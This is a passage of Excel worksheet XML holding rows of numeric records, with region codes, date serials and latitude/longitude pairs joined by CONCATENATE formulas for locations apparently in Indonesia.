        <v>22</v>
      </c>
      <c r="E3958" t="s">
        <v>23</v>
      </c>
      <c r="F3958" t="s">
        <v>13262</v>
      </c>
      <c r="H3958" t="s">
        <v>7086</v>
      </c>
      <c r="I3958" t="s">
        <v>13263</v>
      </c>
      <c r="J3958" t="s">
        <v>1656</v>
      </c>
      <c r="L3958" t="s">
        <v>13264</v>
      </c>
      <c r="M3958">
        <v>3173080003</v>
      </c>
      <c r="N3958">
        <v>3173080</v>
      </c>
      <c r="O3958">
        <v>3173</v>
      </c>
      <c r="P3958">
        <v>31</v>
      </c>
      <c r="Q3958" t="s">
        <v>157</v>
      </c>
      <c r="R3958" t="s">
        <v>157</v>
      </c>
      <c r="S3958" t="s">
        <v>62</v>
      </c>
      <c r="T3958" t="s">
        <v>33</v>
      </c>
      <c r="U3958" s="5">
        <v>1068271494</v>
      </c>
      <c r="V3958" s="5" t="s">
        <v>18024</v>
      </c>
      <c r="W3958" s="5">
        <v>-61753930</v>
      </c>
      <c r="X3958" t="s">
        <v>21756</v>
      </c>
      <c r="Y3958" t="str">
        <f t="shared" si="61"/>
        <v>-6.1753930,106.8271494</v>
      </c>
    </row>
    <row r="3959" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3959">
        <v>298536</v>
      </c>
      <c r="B3959" s="1">
        <v>44488</v>
      </c>
      <c r="C3959" t="s">
        <v>13265</v>
      </c>
      <c r="D3959" t="s">
        <v>22</v>
      </c>
      <c r="E3959" t="s">
        <v>23</v>
      </c>
      <c r="F3959" t="s">
        <v>13266</v>
      </c>
      <c r="G3959" t="s">
        <v>13267</v>
      </c>
      <c r="H3959" t="s">
        <v>26</v>
      </c>
      <c r="I3959" t="s">
        <v>166</v>
      </c>
      <c r="J3959" t="s">
        <v>7444</v>
      </c>
      <c r="L3959" t="s">
        <v>13268</v>
      </c>
      <c r="M3959">
        <v>1709010003</v>
      </c>
      <c r="N3959">
        <v>1709010</v>
      </c>
      <c r="O3959">
        <v>1709</v>
      </c>
      <c r="P3959">
        <v>17</v>
      </c>
      <c r="Q3959" t="s">
        <v>13269</v>
      </c>
      <c r="R3959" t="s">
        <v>13270</v>
      </c>
      <c r="S3959" t="s">
        <v>13271</v>
      </c>
      <c r="T3959" t="s">
        <v>7447</v>
      </c>
      <c r="U3959" s="5">
        <v>1023925857</v>
      </c>
      <c r="V3959" s="5" t="s">
        <v>18025</v>
      </c>
      <c r="W3959" s="5">
        <v>-38048644</v>
      </c>
      <c r="X3959" t="s">
        <v>21757</v>
      </c>
      <c r="Y3959" t="str">
        <f t="shared" si="61"/>
        <v>-3.8048644,102.3925857</v>
      </c>
    </row>
    <row r="3960" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3960">
        <v>298557</v>
      </c>
      <c r="B3960" s="1">
        <v>44488</v>
      </c>
      <c r="C3960" t="s">
        <v>13272</v>
      </c>
      <c r="D3960" t="s">
        <v>22</v>
      </c>
      <c r="E3960" t="s">
        <v>23</v>
      </c>
      <c r="F3960" t="s">
        <v>13273</v>
      </c>
      <c r="H3960" t="s">
        <v>7086</v>
      </c>
      <c r="I3960" t="s">
        <v>7733</v>
      </c>
      <c r="J3960" t="s">
        <v>7277</v>
      </c>
      <c r="L3960" t="s">
        <v>13274</v>
      </c>
      <c r="M3960">
        <v>5107050011</v>
      </c>
      <c r="N3960">
        <v>5107050</v>
      </c>
      <c r="O3960">
        <v>5107</v>
      </c>
      <c r="P3960">
        <v>51</v>
      </c>
      <c r="Q3960" t="s">
        <v>13232</v>
      </c>
      <c r="R3960" t="s">
        <v>13121</v>
      </c>
      <c r="S3960" t="s">
        <v>13106</v>
      </c>
      <c r="T3960" t="s">
        <v>7282</v>
      </c>
      <c r="U3960" s="5">
        <v>1156211910</v>
      </c>
      <c r="V3960" s="5" t="s">
        <v>18026</v>
      </c>
      <c r="W3960" s="5">
        <v>-83347788</v>
      </c>
      <c r="X3960" t="s">
        <v>21758</v>
      </c>
      <c r="Y3960" t="str">
        <f t="shared" si="61"/>
        <v>-8.3347788,115.6211910</v>
      </c>
    </row>
    <row r="3961" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3961">
        <v>298609</v>
      </c>
      <c r="B3961" s="1">
        <v>44488</v>
      </c>
      <c r="C3961" t="s">
        <v>13275</v>
      </c>
      <c r="D3961" t="s">
        <v>22</v>
      </c>
      <c r="E3961" t="s">
        <v>23</v>
      </c>
      <c r="F3961" t="s">
        <v>13276</v>
      </c>
      <c r="G3961" t="s">
        <v>13277</v>
      </c>
      <c r="H3961" t="s">
        <v>7086</v>
      </c>
      <c r="I3961" t="s">
        <v>12245</v>
      </c>
      <c r="J3961" t="s">
        <v>7277</v>
      </c>
      <c r="M3961">
        <v>5107050012</v>
      </c>
      <c r="N3961">
        <v>5107050</v>
      </c>
      <c r="O3961">
        <v>5107</v>
      </c>
      <c r="P3961">
        <v>51</v>
      </c>
      <c r="Q3961" t="s">
        <v>13173</v>
      </c>
      <c r="R3961" t="s">
        <v>13121</v>
      </c>
      <c r="S3961" t="s">
        <v>13106</v>
      </c>
      <c r="T3961" t="s">
        <v>7282</v>
      </c>
      <c r="U3961" s="5">
        <v>1156420684</v>
      </c>
      <c r="V3961" s="5" t="s">
        <v>18027</v>
      </c>
      <c r="W3961" s="5">
        <v>-83345276</v>
      </c>
      <c r="X3961" t="s">
        <v>21759</v>
      </c>
      <c r="Y3961" t="str">
        <f t="shared" si="61"/>
        <v>-8.3345276,115.6420684</v>
      </c>
    </row>
    <row r="3962" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3962">
        <v>298625</v>
      </c>
      <c r="B3962" s="1">
        <v>44488</v>
      </c>
      <c r="C3962" t="s">
        <v>13278</v>
      </c>
      <c r="D3962" t="s">
        <v>22</v>
      </c>
      <c r="E3962" t="s">
        <v>23</v>
      </c>
      <c r="F3962" t="s">
        <v>13279</v>
      </c>
      <c r="G3962" t="s">
        <v>13280</v>
      </c>
      <c r="H3962" t="s">
        <v>7086</v>
      </c>
      <c r="I3962" t="s">
        <v>7087</v>
      </c>
      <c r="J3962" t="s">
        <v>7277</v>
      </c>
      <c r="M3962">
        <v>5107050008</v>
      </c>
      <c r="N3962">
        <v>5107050</v>
      </c>
      <c r="O3962">
        <v>5107</v>
      </c>
      <c r="P3962">
        <v>51</v>
      </c>
      <c r="Q3962" t="s">
        <v>13160</v>
      </c>
      <c r="R3962" t="s">
        <v>13121</v>
      </c>
      <c r="S3962" t="s">
        <v>13106</v>
      </c>
      <c r="T3962" t="s">
        <v>7282</v>
      </c>
      <c r="U3962" s="5">
        <v>1156243229</v>
      </c>
      <c r="V3962" s="5" t="s">
        <v>18028</v>
      </c>
      <c r="W3962" s="5">
        <v>-83625463</v>
      </c>
      <c r="X3962" t="s">
        <v>21760</v>
      </c>
      <c r="Y3962" t="str">
        <f t="shared" si="61"/>
        <v>-8.3625463,115.6243229</v>
      </c>
    </row>
    <row r="3963" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3963">
        <v>298632</v>
      </c>
      <c r="B3963" s="1">
        <v>44488</v>
      </c>
      <c r="C3963" t="s">
        <v>13281</v>
      </c>
      <c r="D3963" t="s">
        <v>22</v>
      </c>
      <c r="E3963" t="s">
        <v>23</v>
      </c>
      <c r="F3963" t="s">
        <v>13282</v>
      </c>
      <c r="G3963" t="s">
        <v>13283</v>
      </c>
      <c r="H3963" t="s">
        <v>7086</v>
      </c>
      <c r="I3963" t="s">
        <v>7087</v>
      </c>
      <c r="J3963" t="s">
        <v>7277</v>
      </c>
      <c r="M3963">
        <v>5107060005</v>
      </c>
      <c r="N3963">
        <v>5107060</v>
      </c>
      <c r="O3963">
        <v>5107</v>
      </c>
      <c r="P3963">
        <v>51</v>
      </c>
      <c r="Q3963" t="s">
        <v>13284</v>
      </c>
      <c r="R3963" t="s">
        <v>13285</v>
      </c>
      <c r="S3963" t="s">
        <v>13106</v>
      </c>
      <c r="T3963" t="s">
        <v>7282</v>
      </c>
      <c r="U3963" s="5">
        <v>1155681252</v>
      </c>
      <c r="V3963" s="5" t="s">
        <v>18029</v>
      </c>
      <c r="W3963" s="5">
        <v>-83975097</v>
      </c>
      <c r="X3963" t="s">
        <v>21761</v>
      </c>
      <c r="Y3963" t="str">
        <f t="shared" si="61"/>
        <v>-8.3975097,115.5681252</v>
      </c>
    </row>
    <row r="3964" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3964">
        <v>298652</v>
      </c>
      <c r="B3964" s="1">
        <v>44488</v>
      </c>
      <c r="C3964" t="s">
        <v>13286</v>
      </c>
      <c r="D3964" t="s">
        <v>22</v>
      </c>
      <c r="E3964" t="s">
        <v>23</v>
      </c>
      <c r="F3964" t="s">
        <v>13287</v>
      </c>
      <c r="G3964" t="s">
        <v>13288</v>
      </c>
      <c r="H3964" t="s">
        <v>7086</v>
      </c>
      <c r="I3964" t="s">
        <v>7421</v>
      </c>
      <c r="J3964" t="s">
        <v>7277</v>
      </c>
      <c r="M3964">
        <v>5106040023</v>
      </c>
      <c r="N3964">
        <v>5106040</v>
      </c>
      <c r="O3964">
        <v>5106</v>
      </c>
      <c r="P3964">
        <v>51</v>
      </c>
      <c r="Q3964" t="s">
        <v>13289</v>
      </c>
      <c r="R3964" t="s">
        <v>13186</v>
      </c>
      <c r="S3964" t="s">
        <v>13187</v>
      </c>
      <c r="T3964" t="s">
        <v>7282</v>
      </c>
      <c r="U3964" s="5">
        <v>1154398927</v>
      </c>
      <c r="V3964" s="5" t="s">
        <v>18030</v>
      </c>
      <c r="W3964" s="5">
        <v>-81921556</v>
      </c>
      <c r="X3964" t="s">
        <v>21762</v>
      </c>
      <c r="Y3964" t="str">
        <f t="shared" si="61"/>
        <v>-8.1921556,115.4398927</v>
      </c>
    </row>
    <row r="3965" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3965">
        <v>298655</v>
      </c>
      <c r="B3965" s="1">
        <v>44488</v>
      </c>
      <c r="C3965" t="s">
        <v>13290</v>
      </c>
      <c r="D3965" t="s">
        <v>22</v>
      </c>
      <c r="E3965" t="s">
        <v>23</v>
      </c>
      <c r="F3965" t="s">
        <v>13291</v>
      </c>
      <c r="G3965" t="s">
        <v>13292</v>
      </c>
      <c r="H3965" t="s">
        <v>7086</v>
      </c>
      <c r="I3965" t="s">
        <v>7087</v>
      </c>
      <c r="J3965" t="s">
        <v>1656</v>
      </c>
      <c r="M3965">
        <v>3173080003</v>
      </c>
      <c r="N3965">
        <v>3173080</v>
      </c>
      <c r="O3965">
        <v>3173</v>
      </c>
      <c r="P3965">
        <v>31</v>
      </c>
      <c r="Q3965" t="s">
        <v>157</v>
      </c>
      <c r="R3965" t="s">
        <v>157</v>
      </c>
      <c r="S3965" t="s">
        <v>62</v>
      </c>
      <c r="T3965" t="s">
        <v>33</v>
      </c>
      <c r="U3965" s="5">
        <v>1068260920</v>
      </c>
      <c r="V3965" s="5" t="s">
        <v>18031</v>
      </c>
      <c r="W3965" s="5">
        <v>-61749487</v>
      </c>
      <c r="X3965" t="s">
        <v>21763</v>
      </c>
      <c r="Y3965" t="str">
        <f t="shared" si="61"/>
        <v>-6.1749487,106.8260920</v>
      </c>
    </row>
    <row r="3966" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3966">
        <v>298656</v>
      </c>
      <c r="B3966" s="1">
        <v>44488</v>
      </c>
      <c r="C3966" t="s">
        <v>13293</v>
      </c>
      <c r="D3966" t="s">
        <v>22</v>
      </c>
      <c r="E3966" t="s">
        <v>23</v>
      </c>
      <c r="F3966" t="s">
        <v>13294</v>
      </c>
      <c r="G3966" t="s">
        <v>13295</v>
      </c>
      <c r="H3966" t="s">
        <v>7086</v>
      </c>
      <c r="I3966" t="s">
        <v>7087</v>
      </c>
      <c r="J3966" t="s">
        <v>1656</v>
      </c>
      <c r="M3966">
        <v>3173080003</v>
      </c>
      <c r="N3966">
        <v>3173080</v>
      </c>
      <c r="O3966">
        <v>3173</v>
      </c>
      <c r="P3966">
        <v>31</v>
      </c>
      <c r="Q3966" t="s">
        <v>157</v>
      </c>
      <c r="R3966" t="s">
        <v>157</v>
      </c>
      <c r="S3966" t="s">
        <v>62</v>
      </c>
      <c r="T3966" t="s">
        <v>33</v>
      </c>
      <c r="U3966" s="5">
        <v>1068277923</v>
      </c>
      <c r="V3966" s="5" t="s">
        <v>18032</v>
      </c>
      <c r="W3966" s="5">
        <v>-61785981</v>
      </c>
      <c r="X3966" t="s">
        <v>21764</v>
      </c>
      <c r="Y3966" t="str">
        <f t="shared" si="61"/>
        <v>-6.1785981,106.8277923</v>
      </c>
    </row>
    <row r="3967" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3967">
        <v>298657</v>
      </c>
      <c r="B3967" s="1">
        <v>44488</v>
      </c>
      <c r="C3967" t="s">
        <v>13296</v>
      </c>
      <c r="D3967" t="s">
        <v>22</v>
      </c>
      <c r="E3967" t="s">
        <v>23</v>
      </c>
      <c r="F3967" t="s">
        <v>13297</v>
      </c>
      <c r="G3967" t="s">
        <v>13298</v>
      </c>
      <c r="H3967" t="s">
        <v>7086</v>
      </c>
      <c r="I3967" t="s">
        <v>7087</v>
      </c>
      <c r="J3967" t="s">
        <v>7277</v>
      </c>
      <c r="M3967">
        <v>5107050010</v>
      </c>
      <c r="N3967">
        <v>5107050</v>
      </c>
      <c r="O3967">
        <v>5107</v>
      </c>
      <c r="P3967">
        <v>51</v>
      </c>
      <c r="Q3967" t="s">
        <v>13120</v>
      </c>
      <c r="R3967" t="s">
        <v>13121</v>
      </c>
      <c r="S3967" t="s">
        <v>13106</v>
      </c>
      <c r="T3967" t="s">
        <v>7282</v>
      </c>
      <c r="U3967" s="5">
        <v>1155815363</v>
      </c>
      <c r="V3967" s="5" t="s">
        <v>18033</v>
      </c>
      <c r="W3967" s="5">
        <v>-83499994</v>
      </c>
      <c r="X3967" t="s">
        <v>21765</v>
      </c>
      <c r="Y3967" t="str">
        <f t="shared" si="61"/>
        <v>-8.3499994,115.5815363</v>
      </c>
    </row>
    <row r="3968" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3968">
        <v>298659</v>
      </c>
      <c r="B3968" s="1">
        <v>44488</v>
      </c>
      <c r="C3968" t="s">
        <v>13299</v>
      </c>
      <c r="D3968" t="s">
        <v>22</v>
      </c>
      <c r="E3968" t="s">
        <v>23</v>
      </c>
      <c r="F3968" t="s">
        <v>13300</v>
      </c>
      <c r="G3968" t="s">
        <v>13301</v>
      </c>
      <c r="H3968" t="s">
        <v>7086</v>
      </c>
      <c r="I3968" t="s">
        <v>7087</v>
      </c>
      <c r="J3968" t="s">
        <v>7277</v>
      </c>
      <c r="M3968">
        <v>5107050010</v>
      </c>
      <c r="N3968">
        <v>5107050</v>
      </c>
      <c r="O3968">
        <v>5107</v>
      </c>
      <c r="P3968">
        <v>51</v>
      </c>
      <c r="Q3968" t="s">
        <v>13120</v>
      </c>
      <c r="R3968" t="s">
        <v>13121</v>
      </c>
      <c r="S3968" t="s">
        <v>13106</v>
      </c>
      <c r="T3968" t="s">
        <v>7282</v>
      </c>
      <c r="U3968" s="5">
        <v>1155840468</v>
      </c>
      <c r="V3968" s="5" t="s">
        <v>18034</v>
      </c>
      <c r="W3968" s="5">
        <v>-83498508</v>
      </c>
      <c r="X3968" t="s">
        <v>21766</v>
      </c>
      <c r="Y3968" t="str">
        <f t="shared" si="61"/>
        <v>-8.3498508,115.5840468</v>
      </c>
    </row>
    <row r="3969" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3969">
        <v>298668</v>
      </c>
      <c r="B3969" s="1">
        <v>44488</v>
      </c>
      <c r="C3969" t="s">
        <v>13302</v>
      </c>
      <c r="D3969" t="s">
        <v>22</v>
      </c>
      <c r="E3969" t="s">
        <v>23</v>
      </c>
      <c r="F3969" t="s">
        <v>13303</v>
      </c>
      <c r="G3969" t="s">
        <v>13304</v>
      </c>
      <c r="H3969" t="s">
        <v>7086</v>
      </c>
      <c r="I3969" t="s">
        <v>7733</v>
      </c>
      <c r="J3969" t="s">
        <v>7277</v>
      </c>
      <c r="M3969">
        <v>5107050008</v>
      </c>
      <c r="N3969">
        <v>5107050</v>
      </c>
      <c r="O3969">
        <v>5107</v>
      </c>
      <c r="P3969">
        <v>51</v>
      </c>
      <c r="Q3969" t="s">
        <v>13160</v>
      </c>
      <c r="R3969" t="s">
        <v>13121</v>
      </c>
      <c r="S3969" t="s">
        <v>13106</v>
      </c>
      <c r="T3969" t="s">
        <v>7282</v>
      </c>
      <c r="U3969" s="5">
        <v>1156137901</v>
      </c>
      <c r="V3969" s="5" t="s">
        <v>18035</v>
      </c>
      <c r="W3969" s="5">
        <v>-83525119</v>
      </c>
      <c r="X3969" t="s">
        <v>21767</v>
      </c>
      <c r="Y3969" t="str">
        <f t="shared" si="61"/>
        <v>-8.3525119,115.6137901</v>
      </c>
    </row>
    <row r="3970" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3970">
        <v>298671</v>
      </c>
      <c r="B3970" s="1">
        <v>44488</v>
      </c>
      <c r="C3970" t="s">
        <v>13305</v>
      </c>
      <c r="D3970" t="s">
        <v>22</v>
      </c>
      <c r="E3970" t="s">
        <v>23</v>
      </c>
      <c r="F3970" t="s">
        <v>13306</v>
      </c>
      <c r="G3970" t="s">
        <v>13307</v>
      </c>
      <c r="H3970" t="s">
        <v>7086</v>
      </c>
      <c r="I3970" t="s">
        <v>7421</v>
      </c>
      <c r="J3970" t="s">
        <v>7277</v>
      </c>
      <c r="M3970">
        <v>5107080008</v>
      </c>
      <c r="N3970">
        <v>5107080</v>
      </c>
      <c r="O3970">
        <v>5107</v>
      </c>
      <c r="P3970">
        <v>51</v>
      </c>
      <c r="Q3970" t="s">
        <v>13308</v>
      </c>
      <c r="R3970" t="s">
        <v>13309</v>
      </c>
      <c r="S3970" t="s">
        <v>13106</v>
      </c>
      <c r="T3970" t="s">
        <v>7282</v>
      </c>
      <c r="U3970" s="5">
        <v>1154463206</v>
      </c>
      <c r="V3970" s="5" t="s">
        <v>18036</v>
      </c>
      <c r="W3970" s="5">
        <v>-82346498</v>
      </c>
      <c r="X3970" t="s">
        <v>21768</v>
      </c>
      <c r="Y3970" t="str">
        <f t="shared" si="61"/>
        <v>-8.2346498,115.4463206</v>
      </c>
    </row>
    <row r="3971" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3971">
        <v>298672</v>
      </c>
      <c r="B3971" s="1">
        <v>44488</v>
      </c>
      <c r="C3971" t="s">
        <v>13310</v>
      </c>
      <c r="D3971" t="s">
        <v>22</v>
      </c>
      <c r="E3971" t="s">
        <v>23</v>
      </c>
      <c r="F3971" t="s">
        <v>13311</v>
      </c>
      <c r="G3971" t="s">
        <v>13312</v>
      </c>
      <c r="H3971" t="s">
        <v>7086</v>
      </c>
      <c r="I3971" t="s">
        <v>7421</v>
      </c>
      <c r="J3971" t="s">
        <v>7277</v>
      </c>
      <c r="M3971">
        <v>5106040023</v>
      </c>
      <c r="N3971">
        <v>5106040</v>
      </c>
      <c r="O3971">
        <v>5106</v>
      </c>
      <c r="P3971">
        <v>51</v>
      </c>
      <c r="Q3971" t="s">
        <v>13289</v>
      </c>
      <c r="R3971" t="s">
        <v>13186</v>
      </c>
      <c r="S3971" t="s">
        <v>13187</v>
      </c>
      <c r="T3971" t="s">
        <v>7282</v>
      </c>
      <c r="U3971" s="5">
        <v>1154393018</v>
      </c>
      <c r="V3971" s="5" t="s">
        <v>18037</v>
      </c>
      <c r="W3971" s="5">
        <v>-82196577</v>
      </c>
      <c r="X3971" t="s">
        <v>21769</v>
      </c>
      <c r="Y3971" t="str">
        <f t="shared" ref="Y3971:Y4034" si="62">CONCATENATE(X3971,",",V3971)</f>
        <v>-8.2196577,115.4393018</v>
      </c>
    </row>
    <row r="3972" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3972">
        <v>298674</v>
      </c>
      <c r="B3972" s="1">
        <v>44488</v>
      </c>
      <c r="C3972" t="s">
        <v>13313</v>
      </c>
      <c r="D3972" t="s">
        <v>22</v>
      </c>
      <c r="E3972" t="s">
        <v>23</v>
      </c>
      <c r="F3972" t="s">
        <v>13314</v>
      </c>
      <c r="G3972" t="s">
        <v>13315</v>
      </c>
      <c r="H3972" t="s">
        <v>7086</v>
      </c>
      <c r="I3972" t="s">
        <v>7087</v>
      </c>
      <c r="J3972" t="s">
        <v>1656</v>
      </c>
      <c r="M3972">
        <v>3173080003</v>
      </c>
      <c r="N3972">
        <v>3173080</v>
      </c>
      <c r="O3972">
        <v>3173</v>
      </c>
      <c r="P3972">
        <v>31</v>
      </c>
      <c r="Q3972" t="s">
        <v>157</v>
      </c>
      <c r="R3972" t="s">
        <v>157</v>
      </c>
      <c r="S3972" t="s">
        <v>62</v>
      </c>
      <c r="T3972" t="s">
        <v>33</v>
      </c>
      <c r="U3972" s="5">
        <v>1068254972</v>
      </c>
      <c r="V3972" s="5" t="s">
        <v>18038</v>
      </c>
      <c r="W3972" s="5">
        <v>-61814942</v>
      </c>
      <c r="X3972" t="s">
        <v>21770</v>
      </c>
      <c r="Y3972" t="str">
        <f t="shared" si="62"/>
        <v>-6.1814942,106.8254972</v>
      </c>
    </row>
    <row r="3973" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3973">
        <v>298676</v>
      </c>
      <c r="B3973" s="1">
        <v>44488</v>
      </c>
      <c r="C3973" t="s">
        <v>13316</v>
      </c>
      <c r="D3973" t="s">
        <v>22</v>
      </c>
      <c r="E3973" t="s">
        <v>23</v>
      </c>
      <c r="F3973" t="s">
        <v>13317</v>
      </c>
      <c r="H3973" t="s">
        <v>7086</v>
      </c>
      <c r="I3973" t="s">
        <v>7421</v>
      </c>
      <c r="J3973" t="s">
        <v>7277</v>
      </c>
      <c r="M3973">
        <v>5107050010</v>
      </c>
      <c r="N3973">
        <v>5107050</v>
      </c>
      <c r="O3973">
        <v>5107</v>
      </c>
      <c r="P3973">
        <v>51</v>
      </c>
      <c r="Q3973" t="s">
        <v>13120</v>
      </c>
      <c r="R3973" t="s">
        <v>13121</v>
      </c>
      <c r="S3973" t="s">
        <v>13106</v>
      </c>
      <c r="T3973" t="s">
        <v>7282</v>
      </c>
      <c r="U3973" s="5">
        <v>1155635952</v>
      </c>
      <c r="V3973" s="5" t="s">
        <v>18039</v>
      </c>
      <c r="W3973" s="5">
        <v>-83458125</v>
      </c>
      <c r="X3973" t="s">
        <v>21771</v>
      </c>
      <c r="Y3973" t="str">
        <f t="shared" si="62"/>
        <v>-8.3458125,115.5635952</v>
      </c>
    </row>
    <row r="3974" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3974">
        <v>298682</v>
      </c>
      <c r="B3974" s="1">
        <v>44488</v>
      </c>
      <c r="C3974" t="s">
        <v>13318</v>
      </c>
      <c r="D3974" t="s">
        <v>22</v>
      </c>
      <c r="E3974" t="s">
        <v>23</v>
      </c>
      <c r="F3974" t="s">
        <v>13319</v>
      </c>
      <c r="G3974" t="s">
        <v>13320</v>
      </c>
      <c r="H3974" t="s">
        <v>7086</v>
      </c>
      <c r="I3974" t="s">
        <v>7087</v>
      </c>
      <c r="J3974" t="s">
        <v>1879</v>
      </c>
      <c r="M3974">
        <v>3173080003</v>
      </c>
      <c r="N3974">
        <v>3173080</v>
      </c>
      <c r="O3974">
        <v>3173</v>
      </c>
      <c r="P3974">
        <v>31</v>
      </c>
      <c r="Q3974" t="s">
        <v>157</v>
      </c>
      <c r="R3974" t="s">
        <v>157</v>
      </c>
      <c r="S3974" t="s">
        <v>62</v>
      </c>
      <c r="T3974" t="s">
        <v>33</v>
      </c>
      <c r="U3974" s="5">
        <v>1068214717</v>
      </c>
      <c r="V3974" s="5" t="s">
        <v>18040</v>
      </c>
      <c r="W3974" s="5">
        <v>-61786699</v>
      </c>
      <c r="X3974" t="s">
        <v>21772</v>
      </c>
      <c r="Y3974" t="str">
        <f t="shared" si="62"/>
        <v>-6.1786699,106.8214717</v>
      </c>
    </row>
    <row r="3975" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3975">
        <v>298689</v>
      </c>
      <c r="B3975" s="1">
        <v>44489</v>
      </c>
      <c r="C3975" t="s">
        <v>13321</v>
      </c>
      <c r="D3975" t="s">
        <v>22</v>
      </c>
      <c r="E3975" t="s">
        <v>23</v>
      </c>
      <c r="F3975" t="s">
        <v>13322</v>
      </c>
      <c r="H3975" t="s">
        <v>7086</v>
      </c>
      <c r="I3975" t="s">
        <v>7087</v>
      </c>
      <c r="J3975" t="s">
        <v>7277</v>
      </c>
      <c r="L3975" t="s">
        <v>13323</v>
      </c>
      <c r="M3975">
        <v>5107050012</v>
      </c>
      <c r="N3975">
        <v>5107050</v>
      </c>
      <c r="O3975">
        <v>5107</v>
      </c>
      <c r="P3975">
        <v>51</v>
      </c>
      <c r="Q3975" t="s">
        <v>13173</v>
      </c>
      <c r="R3975" t="s">
        <v>13121</v>
      </c>
      <c r="S3975" t="s">
        <v>13106</v>
      </c>
      <c r="T3975" t="s">
        <v>7282</v>
      </c>
      <c r="U3975" s="5">
        <v>1156329597</v>
      </c>
      <c r="V3975" s="5" t="s">
        <v>18041</v>
      </c>
      <c r="W3975" s="5">
        <v>-83352635</v>
      </c>
      <c r="X3975" t="s">
        <v>21773</v>
      </c>
      <c r="Y3975" t="str">
        <f t="shared" si="62"/>
        <v>-8.3352635,115.6329597</v>
      </c>
    </row>
    <row r="3976" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3976">
        <v>298686</v>
      </c>
      <c r="B3976" s="1">
        <v>44489</v>
      </c>
      <c r="C3976" t="s">
        <v>13324</v>
      </c>
      <c r="D3976" t="s">
        <v>22</v>
      </c>
      <c r="E3976" t="s">
        <v>23</v>
      </c>
      <c r="F3976" t="s">
        <v>13325</v>
      </c>
      <c r="H3976" t="s">
        <v>7086</v>
      </c>
      <c r="I3976" t="s">
        <v>12293</v>
      </c>
      <c r="J3976" t="s">
        <v>7277</v>
      </c>
      <c r="L3976" t="s">
        <v>13326</v>
      </c>
      <c r="M3976">
        <v>5107050002</v>
      </c>
      <c r="N3976">
        <v>5107050</v>
      </c>
      <c r="O3976">
        <v>5107</v>
      </c>
      <c r="P3976">
        <v>51</v>
      </c>
      <c r="Q3976" t="s">
        <v>13327</v>
      </c>
      <c r="R3976" t="s">
        <v>13121</v>
      </c>
      <c r="S3976" t="s">
        <v>13106</v>
      </c>
      <c r="T3976" t="s">
        <v>7282</v>
      </c>
      <c r="U3976" s="5">
        <v>1156156540</v>
      </c>
      <c r="V3976" s="5" t="s">
        <v>18042</v>
      </c>
      <c r="W3976" s="5">
        <v>-84045785</v>
      </c>
      <c r="X3976" t="s">
        <v>21774</v>
      </c>
      <c r="Y3976" t="str">
        <f t="shared" si="62"/>
        <v>-8.4045785,115.6156540</v>
      </c>
    </row>
    <row r="3977" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3977">
        <v>298687</v>
      </c>
      <c r="B3977" s="1">
        <v>44489</v>
      </c>
      <c r="C3977" t="s">
        <v>13328</v>
      </c>
      <c r="D3977" t="s">
        <v>22</v>
      </c>
      <c r="E3977" t="s">
        <v>23</v>
      </c>
      <c r="F3977" t="s">
        <v>13329</v>
      </c>
      <c r="G3977" t="s">
        <v>13330</v>
      </c>
      <c r="H3977" t="s">
        <v>7086</v>
      </c>
      <c r="I3977" t="s">
        <v>7087</v>
      </c>
      <c r="J3977" t="s">
        <v>7277</v>
      </c>
      <c r="M3977">
        <v>5107050003</v>
      </c>
      <c r="N3977">
        <v>5107050</v>
      </c>
      <c r="O3977">
        <v>5107</v>
      </c>
      <c r="P3977">
        <v>51</v>
      </c>
      <c r="Q3977" t="s">
        <v>13121</v>
      </c>
      <c r="R3977" t="s">
        <v>13121</v>
      </c>
      <c r="S3977" t="s">
        <v>13106</v>
      </c>
      <c r="T3977" t="s">
        <v>7282</v>
      </c>
      <c r="U3977" s="5">
        <v>1155958179</v>
      </c>
      <c r="V3977" s="5" t="s">
        <v>18043</v>
      </c>
      <c r="W3977" s="5">
        <v>-84023910</v>
      </c>
      <c r="X3977" t="s">
        <v>21775</v>
      </c>
      <c r="Y3977" t="str">
        <f t="shared" si="62"/>
        <v>-8.4023910,115.5958179</v>
      </c>
    </row>
    <row r="3978" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3978">
        <v>298747</v>
      </c>
      <c r="B3978" s="1">
        <v>44493</v>
      </c>
      <c r="C3978" t="s">
        <v>13331</v>
      </c>
      <c r="D3978" t="s">
        <v>22</v>
      </c>
      <c r="E3978" t="s">
        <v>23</v>
      </c>
      <c r="F3978" t="s">
        <v>13332</v>
      </c>
      <c r="G3978" t="s">
        <v>13333</v>
      </c>
      <c r="H3978" t="s">
        <v>26</v>
      </c>
      <c r="I3978" t="s">
        <v>1359</v>
      </c>
      <c r="J3978" t="s">
        <v>7436</v>
      </c>
      <c r="L3978" t="s">
        <v>13334</v>
      </c>
      <c r="M3978">
        <v>6171011003</v>
      </c>
      <c r="N3978">
        <v>6171011</v>
      </c>
      <c r="O3978">
        <v>6171</v>
      </c>
      <c r="P3978">
        <v>61</v>
      </c>
      <c r="Q3978" t="s">
        <v>13335</v>
      </c>
      <c r="R3978" t="s">
        <v>13336</v>
      </c>
      <c r="S3978" t="s">
        <v>7789</v>
      </c>
      <c r="T3978" t="s">
        <v>7441</v>
      </c>
      <c r="U3978" s="5">
        <v>1093496490</v>
      </c>
      <c r="V3978" s="5" t="s">
        <v>18044</v>
      </c>
      <c r="W3978" s="5">
        <v>-541806</v>
      </c>
      <c r="X3978" t="s">
        <v>21776</v>
      </c>
      <c r="Y3978" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> -0.0541806,109.3496490</v>
      </c>
    </row>
